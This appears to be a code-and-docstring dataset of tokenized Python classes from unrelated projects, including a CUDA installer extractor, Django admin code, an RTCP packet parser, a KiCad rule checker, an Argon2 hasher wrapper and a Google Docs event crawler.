<NEW_LINE> <INDENT> if ATTR_CURTAIN_LEVEL in data: <NEW_LINE> <INDENT> self._pos = int(data[ATTR_CURTAIN_LEVEL]) <NEW_LINE> return True <NEW_LINE> <DEDENT> return False | Representation of a XiaomiGenericCover. | 62598fab4e4d5625663723cc |
class NonCancellableAPI(BaseFakeAPI): <NEW_LINE> <INDENT> _job_status = [ {'status': 'RUNNING'}, {'status': 'RUNNING'}, {'status': 'RUNNING'} ] | Class for emulating an API without cancellation running a long job. | 62598fab7d43ff24874273d5 |
class LinuxExtractor(Extractor): <NEW_LINE> <INDENT> def extract(self): <NEW_LINE> <INDENT> if os.path.exists("/tmp/cuda-installer.log"): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> os.remove("/tmp/cuda-installer.log") <NEW_LINE> <DEDENT> except OSError as e: <NEW_LINE> <INDENT> raise RuntimeError( "Failed to remove /tmp/cuda-installer.log") from e <NEW_LINE> <DEDENT> <DEDENT> print("Extracting on Linux") <NEW_LINE> runfile = self.blob_dir / self.cu_blob <NEW_LINE> os.chmod(runfile, 0o777) <NEW_LINE> with tempdir() as tmpdir: <NEW_LINE> <INDENT> cmd = [ str(runfile), "--silent", "--toolkit", f"--toolkitpath={tmpdir}", "--override" ] <NEW_LINE> subprocess.run(cmd, env=os.environ.copy(), check=True) <NEW_LINE> if os.path.exists("/tmp/cuda-installer.log"): <NEW_LINE> <INDENT> os.remove("/tmp/cuda-installer.log") <NEW_LINE> <DEDENT> toolkitpath = tmpdir <NEW_LINE> if not os.path.isdir(toolkitpath): <NEW_LINE> <INDENT> print('STATUS:',status) <NEW_LINE> for fn in glob.glob('/tmp/cuda_install_*.log'): <NEW_LINE> <INDENT> f = open(fn, 'r') <NEW_LINE> print('-'*100, fn) <NEW_LINE> print(f.read()) <NEW_LINE> print('-'*100) <NEW_LINE> f.close() <NEW_LINE> <DEDENT> os.system('ldd --version') <NEW_LINE> os.system('ls -la %s' % (tmpdir)) <NEW_LINE> raise RuntimeError( 'Something went wrong in executing `{}`: directory `{}` does not exist' .format(' '.join(cmd), toolkitpath)) <NEW_LINE> <DEDENT> self.copy_files(toolkitpath, self.src_dir) <NEW_LINE> <DEDENT> os.remove(runfile) | The Linux Extractor
| 62598fab2c8b7c6e89bd376b |
class RuleSpec(BaseModel): <NEW_LINE> <INDENT> rule = models.CharField(max_length=50, blank=True) <NEW_LINE> name = models.TextField(blank=True) <NEW_LINE> checks = JSONField(default=[], schema=[basestring]) | A rule specification in a classifier. | 62598fab5166f23b2e24337f |
class Segmentation: <NEW_LINE> <INDENT> def __init__(self, file_path, output_path): <NEW_LINE> <INDENT> self.file_path = file_path <NEW_LINE> self.output_path = output_path <NEW_LINE> <DEDENT> def read_file(self): <NEW_LINE> <INDENT> fileTrainRead = [] <NEW_LINE> for txt_name in self.file_path: <NEW_LINE> <INDENT> with open(txt_name, 'r') as fileTrainRaw: <NEW_LINE> <INDENT> for line in fileTrainRaw: <NEW_LINE> <INDENT> fileTrainRead.append(line) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> return fileTrainRead <NEW_LINE> <DEDENT> def segment(self, data): <NEW_LINE> <INDENT> fileTrainSeg=list(jieba.cut(data, cut_all=False)) <NEW_LINE> return fileTrainSeg <NEW_LINE> <DEDENT> def write_file(self, data): <NEW_LINE> <INDENT> with open(self.output_path, 'w') as fW: <NEW_LINE> <INDENT> for i in range(len(data)): <NEW_LINE> <INDENT> fW.write(data[i][0]) <NEW_LINE> fW.write('\n') | 中文分词类 | 62598fab460517430c432030 |
class ToolAdmin(admin.ModelAdmin): <NEW_LINE> <INDENT> form = ToolForm <NEW_LINE> list_display = [ 'name', 'version', 'in_last_update', ] <NEW_LINE> list_filter = [ 'in_last_update', ] <NEW_LINE> ordering = [ 'enabled', 'in_last_update', 'name', 'version', ] <NEW_LINE> readonly_fields = [ 'name', 'version', 'description', 'in_last_update', 'timeout', ] <NEW_LINE> fieldsets = ( ('Tool Information', { 'fields': ( 'name', 'version', 'description', 'in_last_update', 'timeout', ), 'classes': ('wide',), }), ) <NEW_LINE> def refresh_tools_view(self, *args, **kwargs): <NEW_LINE> <INDENT> Tool.objects.all().update(in_last_update=False) <NEW_LINE> ReviewBotExtension.instance.send_refresh_tools() <NEW_LINE> return HttpResponse('ok') <NEW_LINE> <DEDENT> def get_urls(self): <NEW_LINE> <INDENT> urls = super(ToolAdmin, self).get_urls() <NEW_LINE> my_urls = [ url('^refresh/$', self.admin_site.admin_view(self.refresh_tools_view)), ] <NEW_LINE> return my_urls + urls <NEW_LINE> <DEDENT> def has_add_permission(self, request): <NEW_LINE> <INDENT> return False | Admin site definitions for the Tool model. | 62598fab3cc13d1c6d465712 |
class MoeExampleTestCase(T.TestCase): <NEW_LINE> <INDENT> @T.class_setup <NEW_LINE> def create_webapp(self): <NEW_LINE> <INDENT> from moe import main <NEW_LINE> app = main({}, use_mongo='false') <NEW_LINE> from webtest import TestApp <NEW_LINE> self.testapp = TestApp(app) | Base class for testing the moe examples. | 62598fab76e4537e8c3ef554 |
@attr.s <NEW_LINE> class RtcpRtpfbPacket: <NEW_LINE> <INDENT> fmt = attr.ib() <NEW_LINE> ssrc = attr.ib() <NEW_LINE> media_ssrc = attr.ib() <NEW_LINE> lost = attr.ib(default=attr.Factory(list)) <NEW_LINE> def __bytes__(self): <NEW_LINE> <INDENT> payload = pack('!LL', self.ssrc, self.media_ssrc) <NEW_LINE> if self.lost: <NEW_LINE> <INDENT> pid = self.lost[0] <NEW_LINE> blp = 0 <NEW_LINE> for p in self.lost[1:]: <NEW_LINE> <INDENT> d = p - pid - 1 <NEW_LINE> if d < 16: <NEW_LINE> <INDENT> blp |= (1 << d) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> payload += pack('!HH', pid, blp) <NEW_LINE> pid = p <NEW_LINE> blp = 0 <NEW_LINE> <DEDENT> <DEDENT> payload += pack('!HH', pid, blp) <NEW_LINE> <DEDENT> return pack_rtcp_packet(RTCP_RTPFB, self.fmt, payload) <NEW_LINE> <DEDENT> @classmethod <NEW_LINE> def parse(cls, data, fmt): <NEW_LINE> <INDENT> ssrc, media_ssrc = unpack('!LL', data[0:8]) <NEW_LINE> lost = [] <NEW_LINE> for pos in range(8, len(data), 4): <NEW_LINE> <INDENT> pid, blp = unpack('!HH', data[pos:pos + 4]) <NEW_LINE> lost.append(pid) <NEW_LINE> for d in range(0, 16): <NEW_LINE> <INDENT> if (blp >> d) & 1: <NEW_LINE> <INDENT> lost.append(pid + d + 1) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> return cls(fmt=fmt, ssrc=ssrc, media_ssrc=media_ssrc, lost=lost) | Generic RTP Feedback Message (RFC 4585). | 62598fab5fdd1c0f98e5df3d |
class Rule(KLCRule): <NEW_LINE> <INDENT> def __init__(self, component): <NEW_LINE> <INDENT> super(Rule, self).__init__(component, 'Rule 3.2', 'For black-box symbols, pins have a length of 100mils. Large pin numbers can be accommodated by incrementing the width in steps of 50mil.') <NEW_LINE> <DEDENT> def check(self): <NEW_LINE> <INDENT> self.violating_pins = [] <NEW_LINE> for pin in self.component.pins: <NEW_LINE> <INDENT> length = int(pin['length']) <NEW_LINE> if length == 0: continue <NEW_LINE> if (length < 100) or (length % 50 != 0): <NEW_LINE> <INDENT> self.violating_pins.append(pin) <NEW_LINE> self.verboseOut(Verbosity.HIGH, Severity.ERROR, 'pin: {0} ({1}), {2}'.format(pin['name'], pin['num'], positionFormater(pin))) <NEW_LINE> <DEDENT> <DEDENT> return True if len(self.violating_pins) > 0 else False <NEW_LINE> <DEDENT> def fix(self): <NEW_LINE> <INDENT> self.verboseOut(Verbosity.NORMAL, Severity.INFO, "FIX: not yet supported" ) | Create the methods check and fix to use with the kicad lib files. | 62598fab99fddb7c1ca62dbc |
class ChannelParticipantCreator(TLObject): <NEW_LINE> <INDENT> __slots__ = ["user_id", "rank"] <NEW_LINE> ID = 0x808d15a4 <NEW_LINE> QUALNAME = "types.ChannelParticipantCreator" <NEW_LINE> def __init__(self, *, user_id: int, rank: str = None): <NEW_LINE> <INDENT> self.user_id = user_id <NEW_LINE> self.rank = rank <NEW_LINE> <DEDENT> @staticmethod <NEW_LINE> def read(b: BytesIO, *args) -> "ChannelParticipantCreator": <NEW_LINE> <INDENT> flags = Int.read(b) <NEW_LINE> user_id = Int.read(b) <NEW_LINE> rank = String.read(b) if flags & (1 << 0) else None <NEW_LINE> return ChannelParticipantCreator(user_id=user_id, rank=rank) <NEW_LINE> <DEDENT> def write(self) -> bytes: <NEW_LINE> <INDENT> b = BytesIO() <NEW_LINE> b.write(Int(self.ID, False)) <NEW_LINE> flags = 0 <NEW_LINE> flags |= (1 << 0) if self.rank is not None else 0 <NEW_LINE> b.write(Int(flags)) <NEW_LINE> b.write(Int(self.user_id)) <NEW_LINE> if self.rank is not None: <NEW_LINE> <INDENT> b.write(String(self.rank)) <NEW_LINE> <DEDENT> return b.getvalue() | Attributes:
LAYER: ``112``
Attributes:
ID: ``0x808d15a4``
Parameters:
user_id: ``int`` ``32-bit``
rank (optional): ``str`` | 62598fab99cbb53fe6830e7e |
class Solution: <NEW_LINE> <INDENT> def lowestCommonAncestor(self, root, A, B): <NEW_LINE> <INDENT> common, _, _ = self.helper(root, A, B) <NEW_LINE> return common <NEW_LINE> <DEDENT> def helper(self, root, A, B): <NEW_LINE> <INDENT> if root is None: <NEW_LINE> <INDENT> return None, False, False <NEW_LINE> <DEDENT> lca, lHasA, lHasB = self.helper(root.left, A, B) <NEW_LINE> if lca: <NEW_LINE> <INDENT> return lca, True, True <NEW_LINE> <DEDENT> rca, rHasA, rHasB= self.helper(root.right, A, B) <NEW_LINE> if rca: <NEW_LINE> <INDENT> return rca, True, True <NEW_LINE> <DEDENT> hasA = lHasA or rHasA or root is A <NEW_LINE> hasB = lHasB or rHasB or root is B <NEW_LINE> common = root if hasA and hasB else None <NEW_LINE> return common, hasA, hasB | @param: root: The root of the binary search tree.
@param: A: A TreeNode in a Binary.
@param: B: A TreeNode in a Binary.
@return: Return the least common ancestor(LCA) of the two nodes. | 62598fab7c178a314d78d444 |
class NSNitroNserrInvalnodeid(NSNitroBaseErrors): <NEW_LINE> <INDENT> pass | Nitro error code 362
Invalid node ID specified | 62598fab851cf427c66b8263 |
class DeleteImageCachesResponse(AbstractModel): <NEW_LINE> <INDENT> def __init__(self): <NEW_LINE> <INDENT> self.RequestId = None <NEW_LINE> <DEDENT> def _deserialize(self, params): <NEW_LINE> <INDENT> self.RequestId = params.get("RequestId") | DeleteImageCaches返回参数结构体
| 62598fabf548e778e596b54b |
class CompiledSource(object): <NEW_LINE> <INDENT> def __init__(self, src, kernel_name): <NEW_LINE> <INDENT> self.src = src <NEW_LINE> self.kernel_name = kernel_name <NEW_LINE> self.module = None <NEW_LINE> self.kernel = None <NEW_LINE> <DEDENT> def __call__(self, *args, **kw): <NEW_LINE> <INDENT> if self.module is None: <NEW_LINE> <INDENT> util.log('Compiling... %s', self.kernel_name) <NEW_LINE> self.module = SourceModule(self.src) <NEW_LINE> self.kernel = self.module.get_function(self.kernel_name) <NEW_LINE> <DEDENT> self.kernel(*args, **kw) <NEW_LINE> driver.Context.synchronize() | Compile a source string with PyCuda, caching the resulting module. | 62598fab01c39578d7f12d26 |
class MnistDatabase(Database): <NEW_LINE> <INDENT> def __repr__(self): <NEW_LINE> <INDENT> return f'{type(self).__name__}()' <NEW_LINE> <DEDENT> @cached_property.cached_property <NEW_LINE> def data(self): <NEW_LINE> <INDENT> from appdirs import user_cache_dir <NEW_LINE> path = Path(user_cache_dir('padercontrib')) / 'fgnt_mnist.npz' <NEW_LINE> if not path.exists(): <NEW_LINE> <INDENT> path.parent.mkdir(parents=True, exist_ok=True) <NEW_LINE> data = download(verbose=False) <NEW_LINE> np.savez_compressed(path, **data) <NEW_LINE> <DEDENT> data = np.load(str(path)) <NEW_LINE> data_dict = dict(data) <NEW_LINE> data.close() <NEW_LINE> json = construct_json(data_dict) <NEW_LINE> return json | >>> db = MnistDatabase()
>>> db.get_dataset('train')
DictDataset(name='train', len=60000)
MapDataset(_pickle.loads)
>>> db.get_dataset('test')
DictDataset(name='test', len=10000)
MapDataset(_pickle.loads)
>>> db.get_dataset('test')[0]['image'].shape
(28, 28)
>>> db.get_dataset('test')[0]['digit']
7
>>> type(db.get_dataset('test')[0]['digit'])
<class 'int'> | 62598fab66656f66f7d5a397 |
class SparkDataSources(object): <NEW_LINE> <INDENT> def __init__(self, idDfMapping=dict()): <NEW_LINE> <INDENT> super(SparkDataSources, self).__init__() <NEW_LINE> self._idDfMapping = idDfMapping <NEW_LINE> <DEDENT> def to_java_object(self): <NEW_LINE> <INDENT> jvm_object = _jvm() <NEW_LINE> elems = [] <NEW_LINE> for key, value in list(self._idDfMapping.items()): <NEW_LINE> <INDENT> elems.append(jvm_object.scala.Tuple2(key, value._jdf)) <NEW_LINE> <DEDENT> scalaList = jvm_object.com.ibm.analytics.wml.pipeline.pythonbinding.Helper.javaToScalaList(elems) <NEW_LINE> return jvm_object.com.ibm.analytics.wml.pipeline.spark.SparkDataSources( jvm_object.com.ibm.analytics.wml.pipeline.pythonbinding.Helper.scalaListOfPairsToMap(scalaList)) | SparkDataSources wrapper class | 62598fabdd821e528d6d8edc |
class RevisionMismatchError(ArangoRequestError): <NEW_LINE> <INDENT> pass | There was a mismatch between expected and actual revision. | 62598faba8370b77170f0383 |
class Hasher: <NEW_LINE> <INDENT> __slots__ = [ 'additional_data', 'backend', 'hash_len', 'iterations', 'lanes', 'memory_size', 'salt', 'secret_key', 'threads', 'variant', 'version' ] <NEW_LINE> def __init__( self, *, secret_key: Union[bytes, str, None], additional_data: Union[bytes, str, None] = None, backend: Backend = DEFAULT_BACKEND, hash_len: int = DEFAULT_HASH_LEN, iterations: int = DEFAULT_ITERATIONS, lanes: int = DEFAULT_LANES, memory_size: int = DEFAULT_MEMORY_SIZE, salt: Union[bytes, RandomSalt, str] = DEFAULT_SALT, threads: int = DEFAULT_THREADS, variant: Variant = DEFAULT_VARIANT, version: Version = DEFAULT_VERSION ) -> None: <NEW_LINE> <INDENT> self.additional_data = additional_data <NEW_LINE> self.salt = salt <NEW_LINE> self.secret_key = secret_key <NEW_LINE> self.backend = backend <NEW_LINE> self.hash_len = hash_len <NEW_LINE> self.iterations = iterations <NEW_LINE> self.lanes = lanes <NEW_LINE> self.memory_size = memory_size <NEW_LINE> self.threads = threads <NEW_LINE> self.variant = variant <NEW_LINE> self.version = version <NEW_LINE> <DEDENT> def hash( self, *, password: Union[bytes, str], additional_data: Union[bytes, str, None, Void] = VOID, backend: Union[Backend, Void] = VOID, hash_len: Union[int, Void] = VOID, iterations: Union[int, Void] = VOID, lanes: Union[int, Void] = VOID, memory_size: Union[int, Void] = VOID, salt: Union[bytes, RandomSalt, str, Void] = VOID, secret_key: Union[bytes, str, None, Void] = VOID, threads: Union[int, Void] = VOID, variant: Union[Variant, Void] = VOID, version: Union[Version, Void] = VOID ) -> str: <NEW_LINE> <INDENT> if isinstance(additional_data, Void): <NEW_LINE> <INDENT> additional_data = self.additional_data <NEW_LINE> <DEDENT> if isinstance(backend, Void): <NEW_LINE> <INDENT> backend = self.backend <NEW_LINE> <DEDENT> if isinstance(hash_len, Void): <NEW_LINE> <INDENT> hash_len = self.hash_len <NEW_LINE> <DEDENT> if isinstance(iterations, Void): <NEW_LINE> <INDENT> iterations = self.iterations <NEW_LINE> <DEDENT> if isinstance(lanes, Void): <NEW_LINE> <INDENT> lanes = self.lanes <NEW_LINE> <DEDENT> if isinstance(memory_size, Void): <NEW_LINE> <INDENT> memory_size = self.memory_size <NEW_LINE> <DEDENT> if isinstance(salt, Void): <NEW_LINE> <INDENT> salt = self.salt <NEW_LINE> <DEDENT> if isinstance(secret_key, Void): <NEW_LINE> <INDENT> secret_key = self.secret_key <NEW_LINE> <DEDENT> if isinstance(threads, Void): <NEW_LINE> <INDENT> threads = self.threads <NEW_LINE> <DEDENT> if isinstance(variant, Void): <NEW_LINE> <INDENT> variant = self.variant <NEW_LINE> <DEDENT> if isinstance(version, Void): <NEW_LINE> <INDENT> version = self.version <NEW_LINE> <DEDENT> return hash( additional_data=additional_data, backend=backend, hash_len=hash_len, iterations=iterations, lanes=lanes, memory_size=memory_size, password=password, salt=salt, secret_key=secret_key, threads=threads, variant=variant, version=version ) | A class that knows how to hash | 62598fab8e7ae83300ee9049 |
class MetricTree(Metric): <NEW_LINE> <INDENT> def __init__(self, metric): <NEW_LINE> <INDENT> super(MetricTree, self).__init__(metric.name) <NEW_LINE> self.root = metric <NEW_LINE> self.children = [] <NEW_LINE> <DEDENT> def add_child(self, child): <NEW_LINE> <INDENT> self.children.append(child) <NEW_LINE> <DEDENT> def _for_tree(self, function, *args): <NEW_LINE> <INDENT> result = {} <NEW_LINE> node_value = function(self.root, *args) <NEW_LINE> for subtree in self.children: <NEW_LINE> <INDENT> out = function(subtree, node_value) <NEW_LINE> if out is not None: <NEW_LINE> <INDENT> result.update(out) <NEW_LINE> <DEDENT> <DEDENT> return result <NEW_LINE> <DEDENT> def process(self, *args): <NEW_LINE> <INDENT> return self._for_tree(lambda metric, *in_args: metric.process(*in_args), *args) <NEW_LINE> <DEDENT> def process_final(self, *args): <NEW_LINE> <INDENT> return self._for_tree(lambda metric, *in_args: metric.process_final(*in_args), *args) <NEW_LINE> <DEDENT> def eval(self): <NEW_LINE> <INDENT> self.root.eval() <NEW_LINE> for subtree in self.children: <NEW_LINE> <INDENT> subtree.eval() <NEW_LINE> <DEDENT> <DEDENT> def train(self): <NEW_LINE> <INDENT> self.root.train() <NEW_LINE> for subtree in self.children: <NEW_LINE> <INDENT> subtree.train() <NEW_LINE> <DEDENT> <DEDENT> def reset(self, state): <NEW_LINE> <INDENT> self.root.reset(state) <NEW_LINE> for subtree in self.children: <NEW_LINE> <INDENT> subtree.reset(state) | A tree structure which has a node :class:`Metric` and some children. Upon execution, the node is called with the
input and its output is passed to each of the children. A dict is updated with the results.
:param metric: The metric to act as the root node of the tree / subtree
:type metric: Metric | 62598fab8c0ade5d55dc3665 |
class BoundedArraySpec(ArraySpec): <NEW_LINE> <INDENT> __slots__ = ('_minimum', '_maximum') <NEW_LINE> def __init__(self, shape, dtype, minimum, maximum, name=None): <NEW_LINE> <INDENT> super(BoundedArraySpec, self).__init__(shape, dtype, name) <NEW_LINE> self._minimum = minimum <NEW_LINE> self._maximum = maximum <NEW_LINE> <DEDENT> @property <NEW_LINE> def minimum(self): <NEW_LINE> <INDENT> return self._minimum <NEW_LINE> <DEDENT> @property <NEW_LINE> def maximum(self): <NEW_LINE> <INDENT> return self._maximum <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> template = ('BoundedArraySpec(shape={}, dtype={}, name={}, ' 'minimum={}, maximum={})') <NEW_LINE> return template.format(self.shape, repr(self.dtype), repr(self.name), self._minimum, self._maximum) <NEW_LINE> <DEDENT> def __eq__(self, other): <NEW_LINE> <INDENT> if not isinstance(other, BoundedArraySpec): <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> return (super(BoundedArraySpec, self).__eq__(other) and (self.minimum == other.minimum).all() and (self.maximum == other.maximum).all()) <NEW_LINE> <DEDENT> def validate(self, value): <NEW_LINE> <INDENT> value = np.asarray(value) <NEW_LINE> super(BoundedArraySpec, self).validate(value) <NEW_LINE> if (value < self.minimum).any() or (value > self.maximum).any(): <NEW_LINE> <INDENT> self._fail_validation( 'Values were not all within bounds %s <= value <= %s', self.minimum, self.maximum) <NEW_LINE> <DEDENT> <DEDENT> def generate_value(self): <NEW_LINE> <INDENT> return (np.ones(shape=self.shape, dtype=self.dtype) * self.dtype.type(self.minimum)) | An `ArraySpec` that specifies minimum and maximum values.
Example usage:
```python
# Specifying the same minimum and maximum for every element.
spec = BoundedArraySpec((3, 4), np.float64, minimum=0.0, maximum=1.0)
# Specifying a different minimum and maximum for each element.
spec = BoundedArraySpec(
(2,), np.float64, minimum=[0.1, 0.2], maximum=[0.9, 0.9])
# Specifying the same minimum and a different maximum for each element.
spec = BoundedArraySpec(
(3,), np.float64, minimum=-10.0, maximum=[4.0, 5.0, 3.0])
```
Bounds are meant to be inclusive. This is especially important for
integer types. The following spec will be satisfied by arrays
with values in the set {0, 1, 2}:
```python
spec = BoundedArraySpec((3, 4), np.int, minimum=0, maximum=2)
``` | 62598fab4a966d76dd5eee88 |
class ControllerTests(unittest.TestCase): <NEW_LINE> <INDENT> def test_controller_tick(self): <NEW_LINE> <INDENT> self.pump = Pump('127.0.0.1', 8000) <NEW_LINE> self.pump.set_state = MagicMock(return_value = True) <NEW_LINE> self.pump.get_state = MagicMock(return_value = "PUMP_IN") <NEW_LINE> self.sensor = Sensor('127.0.0.1', 8000) <NEW_LINE> self.sensor.measure = MagicMock(return_value = 20) <NEW_LINE> self.decider = Decider(100, 10) <NEW_LINE> self.controller = Controller(self.sensor, self.pump, self.decider) <NEW_LINE> assert not self.controller.tick() | Unit tests for the Controller class | 62598fab85dfad0860cbfa47 |
class FeatureChart(Chart): <NEW_LINE> <INDENT> def select(self, **restrictions): <NEW_LINE> <INDENT> if restrictions == {}: <NEW_LINE> <INDENT> return iter(self._edges) <NEW_LINE> <DEDENT> restr_keys = sorted(restrictions.keys()) <NEW_LINE> restr_keys = tuple(restr_keys) <NEW_LINE> if restr_keys not in self._indexes: <NEW_LINE> <INDENT> self._add_index(restr_keys) <NEW_LINE> <DEDENT> vals = tuple( self._get_type_if_possible(restrictions[key]) for key in restr_keys ) <NEW_LINE> return iter(self._indexes[restr_keys].get(vals, [])) <NEW_LINE> <DEDENT> def _add_index(self, restr_keys): <NEW_LINE> <INDENT> for key in restr_keys: <NEW_LINE> <INDENT> if not hasattr(EdgeI, key): <NEW_LINE> <INDENT> raise ValueError("Bad restriction: %s" % key) <NEW_LINE> <DEDENT> <DEDENT> index = self._indexes[restr_keys] = {} <NEW_LINE> for edge in self._edges: <NEW_LINE> <INDENT> vals = tuple( self._get_type_if_possible(getattr(edge, key)()) for key in restr_keys ) <NEW_LINE> index.setdefault(vals, []).append(edge) <NEW_LINE> <DEDENT> <DEDENT> def _register_with_indexes(self, edge): <NEW_LINE> <INDENT> for (restr_keys, index) in self._indexes.items(): <NEW_LINE> <INDENT> vals = tuple( self._get_type_if_possible(getattr(edge, key)()) for key in restr_keys ) <NEW_LINE> index.setdefault(vals, []).append(edge) <NEW_LINE> <DEDENT> <DEDENT> def _get_type_if_possible(self, item): <NEW_LINE> <INDENT> if isinstance(item, dict) and TYPE in item: <NEW_LINE> <INDENT> return item[TYPE] <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return item <NEW_LINE> <DEDENT> <DEDENT> def parses(self, start, tree_class=Tree): <NEW_LINE> <INDENT> for edge in self.select(start=0, end=self._num_leaves): <NEW_LINE> <INDENT> if ( (isinstance(edge, FeatureTreeEdge)) and (edge.lhs()[TYPE] == start[TYPE]) and (unify(edge.lhs(), start, rename_vars=True)) ): <NEW_LINE> <INDENT> yield from self.trees(edge, complete=True, tree_class=tree_class) | A Chart for feature grammars.
:see: ``Chart`` for more information. | 62598fab1b99ca400228f503 |
class GaussianNoiseAnnealing(Callback): <NEW_LINE> <INDENT> def __init__(self, parameters, eta=0.3, gamma=0.55): <NEW_LINE> <INDENT> self._parameters = parameters <NEW_LINE> self._eta = eta <NEW_LINE> self._gamma = gamma <NEW_LINE> super(GaussianNoiseAnnealing, self).__init__() <NEW_LINE> <DEDENT> def before_step(self): <NEW_LINE> <INDENT> variance = self._eta / ((1 + self._iteration) ** self._gamma) <NEW_LINE> for param in self._parameters: <NEW_LINE> <INDENT> noise = torch.randn(param.grad.shape, device=param.grad.device) * variance <NEW_LINE> param.grad.add_(noise) | Add gaussian noise to the gradients.
Add gaussian noise to the gradients with the given mean & std. The std will
decrease at each batch up to 0.
# References:
- Adding Gradient Noise Improves Learning for Very Deep Networks
- https://arxiv.org/abs/1511.06807
:param eta: TODO
:param gamma: Decay rate. | 62598fabbd1bec0571e15097 |
class AvgScore(): <NEW_LINE> <INDENT> def __init__(self): <NEW_LINE> <INDENT> self.reset() <NEW_LINE> <DEDENT> def reset(self): <NEW_LINE> <INDENT> self.num_steps = 0 <NEW_LINE> self.total_score = 0. <NEW_LINE> self.total_scores = None <NEW_LINE> <DEDENT> def add(self, score): <NEW_LINE> <INDENT> if isinstance(score, list): <NEW_LINE> <INDENT> if self.total_scores is None: <NEW_LINE> <INDENT> self.total_scores = score <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self.total_scores =[sum(x) for x in zip(self.total_scores, score)] <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> self.total_score += score <NEW_LINE> <DEDENT> self.num_steps += 1 <NEW_LINE> <DEDENT> def avg_score(self): <NEW_LINE> <INDENT> if self.total_scores is None: <NEW_LINE> <INDENT> avg_score_ = self.total_score / self.num_steps <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> avg_score_ = [x / self.num_steps for x in self.total_scores] <NEW_LINE> <DEDENT> self.reset() <NEW_LINE> return avg_score_ | Calcuatlate avg scores, input can be single value or list
Not using numpy, so may be much slower then numpy version, now mainly used for tensorflow testers | 62598fab851cf427c66b8264 |
class IsAdmin(BasePermission): <NEW_LINE> <INDENT> def has_permission(self, request, view): <NEW_LINE> <INDENT> return request.user and request.user.is_authenticated and request.user.is_admin | Allows access only to admin users. | 62598fab5fcc89381b266120 |
@dataclass <NEW_LINE> class AvanzaFondDAO(BaseDao): <NEW_LINE> <INDENT> id: int <NEW_LINE> name: str <NEW_LINE> description: str <NEW_LINE> NAV: str <NEW_LINE> changeSinceOneMonth: str <NEW_LINE> changeSinceThreeMonths: str <NEW_LINE> prospectus: str <NEW_LINE> tradingCurrency: str | The Dao for interesting information about a fund from Fond Marknaden. | 62598fac92d797404e388b38 |
class FATFS(FS): <NEW_LINE> <INDENT> _type = "vfat" <NEW_LINE> _modules = ["vfat"] <NEW_LINE> _labelfs = fslabeling.FATFSLabeling() <NEW_LINE> _supported = True <NEW_LINE> _formattable = True <NEW_LINE> _max_size = Size("1 TiB") <NEW_LINE> _packages = ["dosfstools"] <NEW_LINE> _fsck_class = fsck.DosFSCK <NEW_LINE> _mkfs_class = fsmkfs.FATFSMkfs <NEW_LINE> _mount_class = fsmount.FATFSMount <NEW_LINE> _readlabel_class = fsreadlabel.DosFSReadLabel <NEW_LINE> _writelabel_class = fswritelabel.DosFSWriteLabel <NEW_LINE> _metadata_size_factor = 0.99 <NEW_LINE> parted_system = fileSystemType["fat16"] | FAT filesystem. | 62598fac3317a56b869be51e |
class GdocsCrawlerController: <NEW_LINE> <INDENT> gdc = GdocsCrawler <NEW_LINE> _event_list = [] <NEW_LINE> _event_index_list = [] <NEW_LINE> _event_id_list = [] <NEW_LINE> def __init__(self): <NEW_LINE> <INDENT> self.gdc = GdocsCrawler() <NEW_LINE> <DEDENT> @property <NEW_LINE> def event_list(self): <NEW_LINE> <INDENT> return self._event_list <NEW_LINE> <DEDENT> def load_new_events_list(self): <NEW_LINE> <INDENT> self._event_index_list = self.gdc.new_events_indices <NEW_LINE> self.populate_event_list_from_index_list() <NEW_LINE> <DEDENT> def load_updated_events_list(self): <NEW_LINE> <INDENT> self._event_index_list, self._event_id_list = zip(*self.gdc.updated_events_indices_and_ids) <NEW_LINE> self.populate_event_list_from_index_list() <NEW_LINE> <DEDENT> def populate_event_list_from_index_list(self): <NEW_LINE> <INDENT> self._event_list = [] <NEW_LINE> for i in self._event_index_list: <NEW_LINE> <INDENT> c_event = self.gdc.get_nth_event(i) <NEW_LINE> self._event_list.append(c_event) <NEW_LINE> <DEDENT> <DEDENT> def cleanup_event_list(self): <NEW_LINE> <INDENT> self._event_list, self._event_index_list = zip(*SimpleDeduplicator.remove_duplicates_from_event_list( zip(self._event_list, self._event_index_list))) <NEW_LINE> <DEDENT> def add_events_to_database(self): <NEW_LINE> <INDENT> for i in range(0, len(self._event_index_list), 1): <NEW_LINE> <INDENT> e = self._event_list[i] <NEW_LINE> e_ind = self._event_index_list[i] <NEW_LINE> if not(SimpleDeduplicator.is_duplicate(e)): <NEW_LINE> <INDENT> e.save() <NEW_LINE> self.gdc.write_id_nth_event(e_ind, e.id) <NEW_LINE> self._event_id_list.append(e.id) <NEW_LINE> <DEDENT> c_cat_list = self.gdc.get_categories_nth_element(e_ind) <NEW_LINE> for cat in c_cat_list: <NEW_LINE> <INDENT> assert isinstance(cat, Category) <NEW_LINE> e.category.add(cat) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> def update_events_in_database(self): <NEW_LINE> <INDENT> for i in range(0, len(self._event_id_list), 1): <NEW_LINE> <INDENT> e_id = self._event_id_list[i] <NEW_LINE> e_ind = self._event_index_list[i] <NEW_LINE> e_db = Event.objects.get(id=e_id) <NEW_LINE> e_db = e_db[0] <NEW_LINE> e_new = self._event_list[i] <NEW_LINE> change = e_db.compare(e_new) <NEW_LINE> for (name, val) in change: <NEW_LINE> <INDENT> setattr(e_db, name, val) <NEW_LINE> <DEDENT> e_db.save(update_fields=[name for (name, val) in change]) <NEW_LINE> self.gdc.write_update_status_nth_event(e_ind, False) | GdocsCrawlerController
----------
A controller for the GdocsCrawler.
It takes care of validating the events that the GdocsCrawler returns,
adds them to the database if they are valid and not duplicates of
events already parsed. | 62598fac090684286d5936b0 |
